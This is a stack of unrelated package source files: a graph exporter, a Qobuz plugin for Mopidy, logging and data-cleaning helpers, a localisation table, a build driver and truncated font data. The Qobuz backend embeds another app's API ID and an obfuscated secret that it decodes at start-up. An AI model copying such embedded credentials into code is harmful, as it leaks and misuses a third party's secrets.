self.target_file = open(target_fname, 'w')
self.field_types = field_types
self.field_names = field_names
self.node_properties = node_properties_dict
self.Idx2Label = index_2_label
self.Label2Idx = label_2_index
self.current_Matrix = lil_matrix(current_matrix)
# matrix where M[i,j] = current intesitu from i to j. Triangular superior, if current is
# from j to i, current is negative
# current retrieval for the output should be done by getting all the non-zero terms of
# the current matrix and then filtering out terms/lines that have too little absolute
# current
# rebuilding a new current Matrix and creating a dict to map the relations from the
# previous matrix into a new one.
self.mincurrent = min_current * \
self.current_Matrix[self.current_Matrix.nonzero()].toarray().max()
# minimal current for which we will be performing filtering out of the conductances and
# nodes through which the traffic is below that limit
self.directed = directed
self.verify()
def verify(self):
"""
:raises Exception: "GDF Node declaration is wrong!" - if the length of field names and
field type differ
:raises Exception: "Wrong Types were declared, ...." - if the declared types are not in
the Authorised names
"""
if len(self.field_types) != len(self.field_types):
raise Exception('GDF Node declaration is wrong')
if not set(self.Authorised_names) >= set(self.field_types):
raise Exception(
'Wrong types were declared. please refer to the Doc')
def write_nodedefs(self):
"""
Takes in the dictionary that maps and returns the nodedefs line
"""
accumulator = []
for node_name, node_type in zip(self.field_names, self.field_types):
accumulator.append(node_name + ' ' + node_type)
retstring = ', '.join(accumulator)
retstring = 'nodedef> name VARCHAR, ' + retstring + '\n'
self.target_file.write(retstring)
def write_nodes(self):
"""
Write the nodes with associated informations
"""
for nodename, nodeprops in self.node_properties.iteritems():
if self.mincurrent and float(nodeprops[0]) > self.mincurrent:
self.target_file.write(
str(nodename) + ', ' + ', '.join(nodeprops) + '\n')
else:
self.target_file.write(
str(nodename) + ', ' + ', '.join(nodeprops) + '\n')
def write_edgedefs(self):
"""
Write defintion for the edges. Right now, the information passing through the edges is
restricted to the current
"""
retstring = 'edgedef> node1 VARCHAR, node1 VARCHAR, weight DOUBLE, directed BOOLEAN\n'
self.target_file.write(retstring)
def write_edges(self):
"""
Writes information about edges connections. This information are pulled from the
conductance matrix.
"""
nz = self.current_Matrix.nonzero()
for i, j in zip(nz[0], nz[1]):
if abs(self.current_Matrix[i, j]) > self.mincurrent:
if self.directed:
write_line = ', '.join([str(self.Idx2Label[i]), str(self.Idx2Label[j]),
str(self.current_Matrix[i, j]), 'true']) + '\n'
else:
write_line = ', '.join([str(self.Idx2Label[i]), str(self.Idx2Label[j]),
str(self.current_Matrix[i, j]), 'false']) + '\n'
self.target_file.write(write_line)
def write(self):
"""
Performs all the writing routines and output file closing all at once
"""
self.write_nodedefs()
self.write_nodes()
self.write_edgedefs()
self.write_edges()
self.target_file.close()
if __name__ == "__main__":
pass | PypiClean |
/Mopidy-Qobuz-0.0.1.tar.gz/Mopidy-Qobuz-0.0.1/mopidy_qobuz/backend.py | from __future__ import unicode_literals
import binascii
import logging
import os
import threading
import pykka
import qobuz
from itertools import cycle
from mopidy import backend, httpclient
from mopidy_qobuz import library, playback, playlists
logger = logging.getLogger(__name__)
class QobuzBackend(pykka.ThreadingActor, backend.Backend):
def __init__(self, config, audio):
super(QobuzBackend, self).__init__()
self._config = config
self._session = None
self.library = library.QobuzLibraryProvider(backend=self)
self.playback = playback.QobuzPlaybackProvider(
audio=audio, backend=self
)
self.playlists = playlists.QobuzPlaylistsProvider(backend=self)
self.uri_schemes = ["qobuz"]
def on_start(self):
self._actor_proxy = self.actor_ref.proxy()
# Kodi
app_id = "285473059"
s3b = "Bg8HAA5XAFBYV15UAlVVBAZYCw0MVwcKUVRaVlpWUQ8="
qobuz.api.register_app(
app_id=app_id, app_secret=self.get_s4(app_id, s3b)
)
self._session = qobuz.User(
self._config["qobuz"]["username"],
self._config["qobuz"]["password"],
)
def get_s4(self, app_id, s3b):
"""Return the obfuscated secret.
This is based on the way the Kodi-plugin handles the secret.
While this is just a useless security through obscurity measurement and
could just be calculated once, this functions allows to store the secret
in a not plain text format. Which might be a requirement by Qobuz.
Until the API-team feels like answering any of the mails, this uses the
same obfuscation as Kodi.
Parameters
----------
app_id: str
The ID of the APP, issued by [email protected]
s3b: str
Secret encoded for security through obscurity.
"""
s3s = binascii.a2b_base64(s3b)
try:
return "".join(
chr(x ^ ord(y)) for (x, y) in zip(s3s, cycle(app_id))
)
except TypeError:
# python2
return "".join(
chr(ord(x) ^ ord(y)) for (x, y) in zip(s3s, cycle(app_id))
) | PypiClean |
/citus-0.0.3-py3-none-any.whl/citus/logging.py | import logging
import sys
import typing as t
from werkzeug.local import LocalProxy
from .globals import request
if t.TYPE_CHECKING:
from .app import API
@LocalProxy
def wsgi_errors_stream() -> t.TextIO:
"""Find the most appropriate error stream for the application. If a request
is active, log to ``wsgi.errors``, otherwise use ``sys.stderr``.
If you configure your own :class:`logging.StreamHandler`, you may want to
use this for the stream. If you are using file or dict configuration and
can't import this directly, you can refer to it as
``ext://flask.logging.wsgi_errors_stream``.
"""
return request.environ["wsgi.errors"] if request else sys.stderr
def has_level_handler(logger: logging.Logger) -> bool:
"""Check if there is a handler in the logging chain that will handle the
given logger's :meth:`effective level <~logging.Logger.getEffectiveLevel>`.
"""
level = logger.getEffectiveLevel()
current = logger
while current:
if any(handler.level <= level for handler in current.handlers):
return True
if not current.propagate:
break
current = current.parent # type: ignore
return False
#: Log messages to :func:`~flask.logging.wsgi_errors_stream` with the format
#: ``[%(asctime)s] %(levelname)s in %(module)s: %(message)s``.
default_handler = logging.StreamHandler(wsgi_errors_stream) # type: ignore
default_handler.setFormatter(
logging.Formatter("[%(asctime)s] %(levelname)s in %(module)s: %(message)s")
)
def create_logger(app: "API") -> logging.Logger:
"""Get the Flask app's logger and configure it if needed.
The logger name will be the same as
:attr:`app.import_name <flask.Flask.name>`.
When :attr:`~flask.Flask.debug` is enabled, set the logger level to
:data:`logging.DEBUG` if it is not set.
If there is no handler for the logger's effective level, add a
:class:`~logging.StreamHandler` for
:func:`~flask.logging.wsgi_errors_stream` with a basic format.
"""
logger = logging.getLogger(app.name)
if app.debug and not logger.level:
logger.setLevel(logging.DEBUG)
if not has_level_handler(logger):
logger.addHandler(default_handler)
return logger | PypiClean |
/ML-Navigator-0.0.32.tar.gz/ML-Navigator-0.0.32/preprocessing/data_clean.py | import logging
import os
import pandas as pd
logger = logging.getLogger(__name__)
formatting = (
"%(asctime)s: %(levelname)s: File:%(filename)s Function:%(funcName)s Line:%(lineno)d "
"message:%(message)s"
)
logging.basicConfig(
filename=os.path.join(os.path.dirname(os.path.dirname(__file__)), "logs/logs.log"),
level=logging.INFO,
format=formatting,
)
def drop_corr_columns(dataframe: pd.DataFrame, drop_columns: bool = True,
print_columns: bool = True, threshold: float = 0.98) -> pd.DataFrame:
""" Correlated columns eliminator
The function drop correlated columns and keep only one of these columns. Usually removing high correlated columns
gives improvement in model's quality. The task of this function is first to print list of the most correlated
columns and then remove them by threshold. For more information, please refer to pandas.DataFrame.corr description:
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.corr.html
:param pd.DataFrame dataframe: Pandas dataframe which contains the dataset e.g. train_dataframe.
:param bool drop_columns: If true, all correlated columns will be dropped but one.
:param bool print_columns: If True, information about the correlated columns will be printed to the console.
:param float threshold: A value between 0 and 1. If the correlation between two columns is larger than this.
value, they are considered highly correlated. If drop_columns is True, one of those columns will be dropped. The
recommended value of the `threshold` is in [0.7 ... 1].
:return:
dataframe: A pandas dataframe which contains the dataset after dropping the correlated columns if `drop_columns = True`. Otherwise, the same input dataframe will be returned.
:example:
For checking correlated columns:
>>> dataframe = drop_corr_columns(dataframe, drop_columns=False, print_columns=True, threshold=0.85)
"""
# 1. calculation
logger.info("Calculating the correlation matrix")
correlation_coefficients = dataframe.corr()
# 2. report
corr_fields_list = []
print(f"Columns with correlations more than {str(threshold)} :")
for i in correlation_coefficients:
for j in correlation_coefficients.index[correlation_coefficients[i] >= threshold]:
if i != j and j not in corr_fields_list:
corr_fields_list.append(j)
logger.info("Report information if required")
if print_columns:
logger.debug(f"print_columns = {print_columns}: Information should be reported")
print(
f"{i}-->{j}: r^2={correlation_coefficients[i][correlation_coefficients.index == j].values[0]}"
)
# 3. dropping
logger.info("Dropping high correlated columns if required")
if drop_columns:
logger.debug(f"drop_columns = {drop_columns}: Columns should be dropped")
print(f"{dataframe.shape[1]} columns total")
dataframe = dataframe.drop(corr_fields_list, 1)
print(f"{dataframe.shape[1]} columns left")
return dataframe
def drop_const_columns(dataframe: pd.DataFrame, drop_columns: bool = True, print_columns: bool = True) -> pd.DataFrame:
""" Constant value columns eliminator
This function drops columns that contain constant values. Usually removing constant columns gives improvement in
model's quality. The task of this function is first to print list of constant columns and then drop them.
:param pd.DataFrame dataframe: A pandas dataframe that contain the dataset e.g. train_dataframe
:param bool drop_columns: If true, the columns that contain constant values along all the rows will be dropped.
:param bool print_columns: If true, information about the columns that contain constant values will be printed to the console
:return:
dataframe: A pandas dataframe that contains the dataset after dropping the the columns that contain
constant values if `drop_columns = True`
:example:
For checking the columns which have constant value:
>>> dataframe = drop_const_columns(dataframe, drop_columns=False, print_columns=True)
"""
# 1. report
single_value_cols = []
for col in dataframe.columns:
unique_count = dataframe[col].nunique()
if unique_count < 2:
single_value_cols.append(col)
logger.info("Calculating the correlation matrix")
if print_columns:
logger.debug(f"print_columns = {print_columns}: Information should be reported")
print(col, unique_count)
print(f"Constant columns count: {len(single_value_cols)}")
# 2. dropping
logger.info("Dropping high correlated columns if required")
if drop_columns:
logger.debug(f"drop_columns = {drop_columns}: Columns should be dropped")
print(f"{dataframe.shape[1]} columns total")
dataframe = dataframe.drop(single_value_cols, 1)
print(f"{dataframe.shape[1]} columns left")
return dataframe | PypiClean |
/ClueDojo-1.4.3-1.tar.gz/ClueDojo-1.4.3-1/src/cluedojo/static/dojo/nls/ja/colors.js | ({"lightsteelblue":"ライト・スチール・ブルー","orangered":"オレンジ・レッド","midnightblue":"ミッドナイト・ブルー","cadetblue":"くすんだ青","seashell":"シーシェル","slategrey":"スレート・グレイ","coral":"珊瑚","darkturquoise":"ダーク・ターコイズ","antiquewhite":"アンティーク・ホワイト","mediumspringgreen":"ミディアム・スプリング・グリーン","salmon":"サーモン","darkgrey":"ダーク・グレイ","ivory":"アイボリー","greenyellow":"緑黄色","mistyrose":"ミスティ・ローズ","lightsalmon":"ライト・サーモン","silver":"銀","dimgrey":"くすんだグレイ","orange":"オレンジ","white":"白","navajowhite":"ナバホ・ホワイト","royalblue":"藤色","deeppink":"濃いピンク","lime":"ライム","oldlace":"オールド・レイス","chartreuse":"淡黄緑","darkcyan":"ダーク・シアン・ブルー","yellow":"黄","linen":"亜麻色","olive":"オリーブ","gold":"金","lawngreen":"ローン・グリーン","lightyellow":"ライト・イエロー","tan":"茶褐色","darkviolet":"ダーク・バイオレット","lightslategrey":"ライト・スレート・グレイ","grey":"グレイ","darkkhaki":"ダーク・カーキー","green":"緑","deepskyblue":"濃い空色","aqua":"アクア","sienna":"黄褐色","mintcream":"ミント・クリーム","rosybrown":"ロージー・ブラウン","mediumslateblue":"ミディアム・スレート・ブルー","magenta":"赤紫","lightseagreen":"ライト・シー・グリーン","cyan":"シアン・ブルー","olivedrab":"濃黄緑","darkgoldenrod":"ダーク・ゴールデン・ロッド","slateblue":"スレート・ブルー","mediumaquamarine":"ミディアム・アクアマリーン","lavender":"ラベンダー","mediumseagreen":"ミディアム・シー・グリーン","maroon":"えび茶","darkslategray":"ダーク・スレート・グレイ","mediumturquoise":"ミディアム・ターコイズ","ghostwhite":"ゴースト・ホワイト","darkblue":"ダーク・ブルー","mediumvioletred":"ミディアム・バイオレット・レッド","brown":"茶","lightgray":"ライト・グレイ","sandybrown":"砂褐色","pink":"ピンク","firebrick":"赤煉瓦色","indigo":"藍色","snow":"雪色","darkorchid":"ダーク・オーキッド","turquoise":"ターコイズ","chocolate":"チョコレート","springgreen":"スプリング・グリーン","moccasin":"モカシン","navy":"濃紺","lemonchiffon":"レモン・シフォン","teal":"ティール","floralwhite":"フローラル・ホワイト","cornflowerblue":"コーンフラワー・ブルー","paleturquoise":"ペイル・ターコイズ","purple":"紫","gainsboro":"ゲインズボーロ","plum":"深紫","red":"赤","blue":"青","forestgreen":"フォレスト・グリーン","darkgreen":"ダーク・グリーン","honeydew":"ハニーデュー","darkseagreen":"ダーク・シー・グリーン","lightcoral":"ライト・コーラル","palevioletred":"ペイル・バイオレット・レッド","mediumpurple":"ミディアム・パープル","saddlebrown":"サドル・ブラウン","darkmagenta":"ダーク・マジェンタ","thistle":"シスル","whitesmoke":"ホワイト・スモーク","wheat":"小麦色","violet":"すみれ色","lightskyblue":"ライト・スカイ・ブルー","goldenrod":"ゴールデン・ロッド","mediumblue":"ミディアム・ブルー","skyblue":"スカイ・ブルー","crimson":"深紅","darksalmon":"ダーク・サーモン","darkred":"ダーク・レッド","darkslategrey":"ダーク・スレート・グレイ","peru":"ペルー","lightgrey":"ライト・グレイ","lightgoldenrodyellow":"ライト・ゴールデン・ロッド・イエロー","blanchedalmond":"皮なしアーモンド","aliceblue":"アリス・ブルー","bisque":"ビスク","slategray":"スレート・グレイ","palegoldenrod":"ペイル・ゴールデン・ロッド","darkorange":"ダーク・オレンジ","aquamarine":"碧緑","lightgreen":"ライト・グリーン","burlywood":"バーリーウッド","dodgerblue":"ドッジャー・ブルー","darkgray":"ダーク・グレイ","lightcyan":"ライト・シアン","powderblue":"淡青","blueviolet":"青紫","orchid":"薄紫","dimgray":"くすんだグレイ","beige":"ベージュ","fuchsia":"紫紅色","lavenderblush":"ラベンダー・ブラッシ","hotpink":"ホット・ピンク","steelblue":"鋼色","tomato":"トマト色","lightpink":"ライト・ピンク","limegreen":"ライム・グリーン","indianred":"インディアン・レッド","papayawhip":"パパイア・ホイップ","lightslategray":"ライト・スレート・グレイ","gray":"グレイ","mediumorchid":"ミディアム・オーキッド","cornsilk":"コーンシルク","black":"黒","seagreen":"シー・グリーン","darkslateblue":"ダーク・スレート・ブルー","khaki":"カーキー","lightblue":"ライト・ブルー","palegreen":"ペイル・グリーン","azure":"薄い空色","peachpuff":"ピーチ・パフ","darkolivegreen":"ダーク・オリーブ・グリーン","yellowgreen":"黄緑"}) | PypiClean |
/DLRN-0.26.1.tar.gz/DLRN-0.26.1/dlrn/drivers/mockdriver.py |
# BuildRPMDriver derived classes expose the following methods:
#
# build_package(). This method will perform the actual package build using
# the driver-specific approach.
from dlrn.config import setup_logging
from dlrn.drivers.buildrpm import BuildRPMDriver
import io
import logging
import os
import re
import sh
logger = logging.getLogger("dlrn-build-mock")
class MockBuildDriver(BuildRPMDriver):
DRIVER_CONFIG = {
'mockbuild_driver': {
'install_after_build': {'type': 'boolean', 'default': True},
},
}
# We are using this method to "tee" mock output to mock.log and stdout
def _process_mock_output(self, line):
if self.verbose_build:
logger.info(line[:-1])
self.mock_fp.write(line)
def __init__(self, *args, **kwargs):
super(MockBuildDriver, self).__init__(*args, **kwargs)
self.verbose_build = False
setup_logging()
def build_package(self, **kwargs):
"""Valid parameters:
:param output_directory: directory where the SRPM is located,
and the built packages will be.
:param additional_mock_opts: string with additional options to
be passed to mock.
"""
output_dir = kwargs.get('output_directory')
additional_mock_opts = kwargs.get('additional_mock_opts')
datadir = os.path.realpath(self.config_options.datadir)
mock_config = os.environ.get('MOCK_CONFIG')
install_after_build = self.config_options.install_after_build
self.verbose_build = kwargs.get('verbose')
# Find src.rpm
for rpm in os.listdir(output_dir):
if rpm.endswith(".src.rpm"):
src_rpm = '%s/%s' % (output_dir, rpm)
try:
# And build package
with io.open("%s/mock.log" % output_dir, 'a',
encoding='utf-8', errors='replace') as self.mock_fp:
try:
mock_opts = ['-v', '-r', '%s/%s' % (datadir, mock_config),
'--resultdir', output_dir]
if additional_mock_opts:
mock_opts += [additional_mock_opts]
mock_opts += ['--rebuild', src_rpm]
sh.env('/usr/bin/mock', *mock_opts,
postinstall=install_after_build,
_err=self._process_mock_output,
_out=self._process_mock_output)
except Exception as e:
raise e
if install_after_build:
# Check for warning about built packages failing to install
with open("%s/mock.log" % output_dir, 'r') as fp:
mock_content = fp.readlines()
warn_match = re.compile(
r'\W*WARNING: Failed install built packages.*')
for line in mock_content:
m = warn_match.match(line)
if m is not None:
raise Exception('Failed to install built packages')
# All went fine, create the $OUTPUT_DIRECTORY/installed file
open('%s/installed' % output_dir, 'a').close()
finally:
with open("%s/mock.log" % output_dir, 'r') as fp:
mock_content = fp.readlines()
# Append mock output to rpmbuild.log
with open('%s/rpmbuild.log' % output_dir, 'a') as fp:
for line in mock_content:
fp.write(line)
# Finally run restorecon
try:
sh.restorecon('-Rv', output_dir)
except Exception as e:
logger.info('restorecon did not run correctly, %s' % e) | PypiClean |
/NuPlone-2.2.0.tar.gz/NuPlone-2.2.0/plonetheme/nuplone/skin/templates/style/euphorie/fonts/angelina-cufon.js | Cufon.registerFont({"w":2576,"face":{"font-family":"Angelina","font-weight":400,"font-stretch":"normal","units-per-em":"2100","panose-1":"0 0 4 0 0 0 0 0 0 0","ascent":"1680","descent":"-420","x-height":"94","cap-height":"153","bbox":"-505.11 -1364 1691.45 835","underline-thickness":"20","underline-position":"-123","unicode-range":"U+0020-U+00FF"},"glyphs":{" ":{"w":544},"!":{"d":"225,-1089v26,0,60,32,49,62v-60,164,-90,367,-90,610v0,147,31,239,87,283v21,17,22,33,9,43v-8,6,-21,3,-42,-4v-70,-24,-139,-164,-145,-258v-10,-161,7,-311,35,-483v28,-169,61,-253,97,-253xm284,87v0,21,-49,50,-69,50v-41,0,-62,-15,-62,-46v0,-37,21,-56,64,-56v45,0,67,17,67,52","w":418,"k":{"\u00d0":63,"\u00c1":78,"\u00c2":54,"\u00c0":273,"\u00d1":39,"\u00c9":342,"~":142,"y":121,"x":-24,"v":25,"u":-44,"t":85,"r":-24,"q":-50,"p":-25,"o":-24,"n":-52,"m":-96,"k":-45,"j":-92,"h":-33,"f":29,"e":-42,"c":-35,"b":-58,"a":-28,"`":90,"Z":-41,"Y":-38,"X":-65,"W":-21,"T":-32,"S":26,"R":-56,"Q":-51,"P":-53,"O":-52,"M":-32,"L":-58,"K":-86,"I":-38,"H":-82,"G":-51,"F":-28,"E":-33,"D":-43,"C":-63,"B":-53,"A":-32,"@":113,"?":43,";":130,":":141,"6":-21,"5":-44,"2":-70,"1":-22,"0":-34,".":415,"-":87,",":72,")":77,"&":67,"%":-34,"#":101,"!":125}},"\"":{"d":"356,-852v-1,90,-72,220,-128,260v-18,13,-51,13,-50,-14v0,-11,6,-23,19,-32v45,-30,65,-129,52,-217v-4,-22,44,-52,69,-52v25,0,38,18,38,55xm223,-852v-1,90,-72,220,-128,260v-18,13,-51,13,-50,-14v0,-11,6,-23,19,-32v45,-30,65,-129,52,-217v-3,-23,43,-52,69,-52v25,0,38,18,38,55","w":426},"#":{"d":"680,-113v-2,21,-11,31,-27,31v-23,0,-33,-15,-29,-46v19,-159,81,-359,184,-598v107,-249,217,-429,321,-544v30,-33,104,10,68,50v-103,111,-211,286,-323,526v-112,240,-176,434,-194,581xm1322,-884v-1,29,-16,43,-42,37v-346,-77,-953,-22,-1219,85v-20,8,-43,3,-43,-21v0,-16,10,-28,29,-36v202,-84,614,-144,908,-144v137,0,249,11,335,32v22,5,33,21,32,47xm1331,-570v0,29,-16,43,-42,37v-345,-77,-953,-22,-1219,85v-21,7,-43,2,-43,-22v0,-16,10,-28,29,-35v202,-85,614,-145,909,-145v137,0,248,11,335,33v21,5,32,21,31,47xm281,-44v-2,21,-11,31,-27,31v-23,0,-33,-15,-29,-46v19,-160,81,-359,184,-598v108,-249,217,-428,321,-544v31,-34,104,11,68,50v-103,111,-210,286,-322,526v-112,240,-177,434,-195,581","w":1362,"k":{"\u00d0":426,"\u00c1":667,"\u00c2":110,"\u00c0":873,"\u00a2":-114,"\u00d1":402,"\u00c9":953,"~":393,"z":29,"y":31,"w":21,"v":-59,"u":23,"t":132,"s":35,"r":-35,"q":155,"o":62,"m":-76,"l":-43,"k":-66,"j":105,"h":-30,"g":139,"f":86,"e":95,"d":226,"c":87,"b":-53,"a":209,"`":30,"Z":93,"Y":-81,"X":41,"W":21,"V":-41,"U":-67,"T":-82,"S":-73,"R":-113,"Q":-71,"P":-111,"O":-69,"N":-25,"M":-41,"L":96,"K":-118,"J":187,"I":138,"H":91,"G":-60,"F":-87,"E":-90,"D":-70,"C":-39,"A":197,"@":30,";":289,":":617,"9":-40,"8":-82,"7":160,"3":100,"0":-77,"\/":314,".":1026,"-":452,",":780,")":259,"&":197,"%":282,"$":-86,"#":138,"!":49}},"$":{"d":"369,-1221v39,-1,123,44,123,84v0,29,-12,43,-35,43v-10,0,-76,-40,-90,-37v-11,-1,-26,2,-45,9v-23,96,-43,202,-58,319v143,12,215,63,215,154v0,57,-26,110,-77,160v-45,43,-99,76,-164,99v1,60,6,111,13,153v4,25,-3,37,-22,37v-17,0,-28,-11,-32,-34v-7,-40,-11,-87,-14,-141v-20,3,-39,5,-56,5v-70,2,-147,-54,-143,-122v2,-34,39,-105,84,-87v-3,35,-19,48,-19,77v0,30,18,45,55,45v20,0,45,-4,76,-12v-1,-84,1,-172,7,-263v-66,-4,-123,-1,-176,-23v-41,-17,-61,-38,-61,-65v0,-49,33,-113,100,-191v64,-75,132,-132,203,-172v14,-60,31,-110,47,-153v14,-39,100,-21,80,24v-11,26,-21,57,-32,92v7,-1,14,-1,21,-1xm193,-806v9,-95,21,-183,36,-266v-48,34,-89,72,-123,113v-37,45,-55,82,-55,113v0,27,47,41,142,40xm412,-636v0,-53,-62,-92,-116,-92r-40,-2v-9,85,-15,166,-17,243v115,-43,173,-93,173,-149","w":547,"k":{"\u00d0":36,"\u00c1":340,"\u00c2":75,"\u00c0":517,"\u00a2":-117,"\u00c9":609,"~":29,"x":-71,"v":-109,"t":50,"r":-86,"q":114,"p":-39,"o":38,"n":-32,"m":-111,"l":-67,"k":-86,"j":119,"h":-47,"g":117,"f":65,"e":73,"d":218,"c":64,"b":-68,"a":165,"`":184,"Z":198,"X":-101,"W":-113,"V":-52,"U":61,"T":35,"S":-92,"Q":-79,"O":-77,"N":-113,"M":-100,"L":83,"K":-140,"I":-41,"H":21,"G":-67,"E":35,"D":-94,"C":-43,"B":-157,"A":127,";":250,":":171,"9":-72,"8":-116,"7":79,"3":236,"2":-85,"1":64,"0":-95,"\/":286,".":271,"-":66,",":339,")":90,"(":-25,"&":142,"%":260,"$":-46,"#":70,"!":23}},"%":{"d":"601,-940v21,3,104,6,143,2v44,-38,85,-70,123,-96v24,-16,62,-7,71,17v7,19,0,38,-25,58v-218,162,-376,322,-590,589v-173,216,-293,396,-353,543v-14,34,-59,36,-58,-7v0,-8,2,-16,6,-24v59,-137,161,-304,308,-502v147,-198,293,-368,440,-507v-28,-2,-53,-6,-76,-11v-32,107,-79,168,-141,181v-73,15,-120,-19,-118,-100v0,-41,13,-87,39,-138v26,-51,51,-76,73,-76v23,0,34,10,34,30v0,6,-5,16,-16,30v-41,53,-61,103,-61,149v0,35,7,52,21,52v44,0,81,-49,111,-147v-53,-23,-79,-55,-76,-98v3,-37,23,-56,61,-56v54,0,82,37,84,111xm393,-238v-5,-17,57,-49,74,-49v53,0,80,36,81,108v1,34,-12,78,-39,131v-33,64,-70,101,-113,110v-73,16,-118,-18,-118,-99v0,-42,14,-88,40,-139v26,-51,50,-76,72,-76v23,0,34,10,34,31v0,1,-12,22,-38,62v-26,40,-39,79,-39,117v0,34,7,51,21,51v49,0,123,-145,121,-195v-3,-76,-35,-60,-73,-25v-10,-6,-24,-11,-23,-27xm542,-955v-3,-30,-10,-45,-21,-45v-7,0,-11,-1,-11,2v0,20,11,34,32,43","w":895,"k":{"\u00d0":344,"\u00c1":365,"\u00c2":283,"\u00c0":603,"\u00a2":-94,"\u00d1":319,"\u00c9":255,"~":138,"z":217,"y":218,"x":82,"w":205,"v":178,"u":178,"t":205,"s":230,"r":147,"q":185,"p":203,"o":194,"n":180,"m":124,"l":-101,"k":-96,"j":153,"i":-47,"h":-56,"g":216,"f":62,"e":175,"d":230,"c":182,"b":-49,"a":208,"`":-92,"Z":-24,"Y":-152,"X":-92,"V":-46,"U":-121,"T":-155,"S":47,"R":-142,"Q":-53,"P":-154,"O":-58,"M":-44,"K":-163,"J":-42,"I":-156,"G":28,"F":-90,"E":-74,"D":-63,"C":84,"A":191,"@":256,"?":24,";":450,":":369,"9":32,"8":43,"7":-119,"6":129,"4":43,"3":78,"1":-26,"0":-23,"\/":275,".":329,"-":374,",":427,")":83,"(":48,"&":188,"%":223,"$":-124,"#":91}},"&":{"d":"475,-107v-18,0,-66,-98,-61,-110v0,-60,40,-112,125,-139r231,-73v83,-33,125,-79,125,-138v0,-39,-19,-69,-58,-92v-39,-23,-58,-38,-58,-45v0,-19,12,-29,36,-29v31,0,63,19,99,55v90,88,70,222,-28,287v-84,57,-208,68,-346,113v-45,15,-66,40,-66,68v0,12,31,63,28,75v0,19,-9,28,-27,28xm814,-840v0,37,-69,74,-92,29v-43,-83,-112,-123,-204,-123v-104,0,-174,38,-211,115v-8,18,-12,35,-12,52v0,47,33,91,98,133v3,2,57,28,159,81v15,8,115,2,129,14v25,10,38,27,38,51v0,30,-29,41,-61,34v-66,-16,-149,-11,-188,-12v-45,-2,-101,17,-170,57v-76,45,-129,95,-155,153v-43,93,-10,161,73,218v68,47,141,71,245,73v221,4,379,-165,299,-403v-6,-18,0,-39,20,-34v15,3,26,16,35,40v64,181,17,331,-135,417v-96,54,-202,73,-320,60v-130,-14,-302,-154,-302,-291v0,-31,7,-61,21,-90v51,-114,180,-231,306,-265v-118,-54,-177,-123,-177,-207v0,-29,7,-60,22,-91v58,-126,178,-184,353,-171v37,3,81,20,134,50v63,36,95,73,95,110","w":1062,"k":{"\u00d0":-43,"\u00c1":218,"\u00c2":77,"\u00c0":432,"\u00a2":-95,"\u00d1":-67,"\u00c9":133,"~":163,"v":-84,"s":-27,"r":-57,"q":39,"p":-25,"n":-34,"m":-110,"l":-36,"k":-62,"j":97,"h":-29,"g":68,"f":44,"e":33,"d":113,"c":28,"b":-53,"a":67,"`":230,"Z":84,"Y":71,"X":60,"W":-104,"V":59,"U":60,"T":69,"S":-71,"Q":-72,"P":21,"O":-72,"N":-26,"M":21,"L":114,"K":-112,"J":310,"I":169,"G":-67,"C":-53,"B":-100,"A":59,"?":104,";":220,":":139,"9":-36,"8":-82,"7":161,"5":-26,"3":34,"2":44,"1":81,"0":-77,"\/":159,".":207,",":284,")":275,"&":146,"%":142,"$":-48,"#":35,"!":54}},"'":{"d":"235,-852v-2,90,-72,220,-129,260v-18,12,-51,13,-49,-14v0,-11,6,-22,18,-32v37,-29,56,-85,56,-169v0,-39,-14,-59,18,-82v38,-27,88,-28,86,37","w":284},"(":{"d":"124,-509v-18,79,-27,160,-27,245v0,216,66,344,199,383v27,38,17,89,-45,73v-85,-22,-147,-85,-190,-193v-55,-139,-63,-404,-25,-570v47,-212,177,-462,324,-556v25,-15,46,-1,57,26v9,22,8,40,-4,53v-151,175,-247,355,-289,539","w":465,"k":{"\u00d0":186,"\u00c1":111,"\u00c2":140,"\u00c0":388,"\u00d1":161,"\u00c9":196,"~":184,"z":99,"y":245,"x":36,"w":126,"v":115,"u":95,"t":203,"s":139,"r":82,"q":119,"o":150,"n":53,"m":21,"l":-37,"k":-32,"j":25,"i":53,"g":169,"f":145,"e":130,"d":60,"c":147,"b":25,"a":45,"`":45,"Z":21,"Y":-62,"X":-81,"W":44,"V":28,"U":-27,"T":-60,"S":99,"R":-61,"Q":34,"P":-66,"O":34,"N":24,"L":-33,"K":-90,"J":93,"I":-97,"H":-58,"G":118,"F":-22,"C":91,"@":224,"?":71,";":119,":":270,"8":58,"7":-73,"6":87,"4":109,"3":73,"2":-25,"0":74,".":269,"-":210,",":95,")":69,"(":130,"&":259,"%":-21,"#":131,"!":84}},")":{"d":"91,189v-14,9,-28,14,-42,14v-32,2,-38,-23,-22,-42v150,-174,249,-371,300,-589v18,-79,27,-160,27,-245v0,-216,-66,-344,-199,-384v-9,-15,-14,-28,-14,-40v0,-31,20,-41,59,-32v85,19,147,84,190,192v55,138,63,405,25,570v-47,211,-176,462,-324,556","w":463,"k":{"\u00d0":-132,"\u00c1":85,"\u00c0":351,"\u00a2":-187,"\u00d1":-157,"\u00c9":36,"~":-37,"z":-82,"y":-72,"x":-137,"w":-96,"v":-161,"u":-102,"t":-98,"s":-132,"r":-142,"q":-72,"p":-99,"o":-87,"n":-110,"m":-187,"l":-124,"k":-145,"j":-22,"i":-99,"h":-115,"g":-49,"f":-123,"e":-93,"c":-90,"b":-142,"a":-41,"Z":-22,"Y":-128,"X":-53,"W":-190,"V":-148,"U":-135,"T":-139,"S":-155,"R":-179,"Q":-159,"P":-174,"O":-163,"N":-177,"M":-181,"K":-199,"J":53,"I":-98,"H":-100,"G":-150,"F":-160,"E":-170,"D":-199,"C":-147,"B":-220,"A":-94,"@":-77,"?":-113,";":142,":":58,"9":-120,"8":-176,"7":-56,"6":-101,"5":-135,"4":-109,"3":-78,"2":-180,"1":-83,"0":-161,"\/":47,".":110,"-":-109,",":177,")":127,"(":-96,"%":30,"$":-159,"#":-57,"!":-34}},"*":{},"+":{},",":{"d":"116,150v-29,11,-44,4,-44,-21v0,-15,9,-25,28,-32v54,-22,104,-119,113,-192v3,-21,24,-32,63,-32v30,0,45,13,44,39v-1,35,-23,79,-66,131v-45,54,-91,90,-138,107","w":453,"k":{"\u00d0":343,"\u00c1":92,"\u00c2":49,"\u00c0":291,"\u00a2":281,"\u00d1":298,"~":448,"z":-67,"x":-36,"w":-47,"v":122,"u":-63,"t":156,"s":-24,"r":-38,"q":-60,"p":-29,"o":-42,"n":-67,"m":-106,"k":-25,"j":-53,"h":-39,"f":100,"e":-66,"d":-56,"c":-53,"b":-51,"a":-67,"`":431,"Z":-67,"Y":100,"X":-80,"W":254,"V":324,"T":304,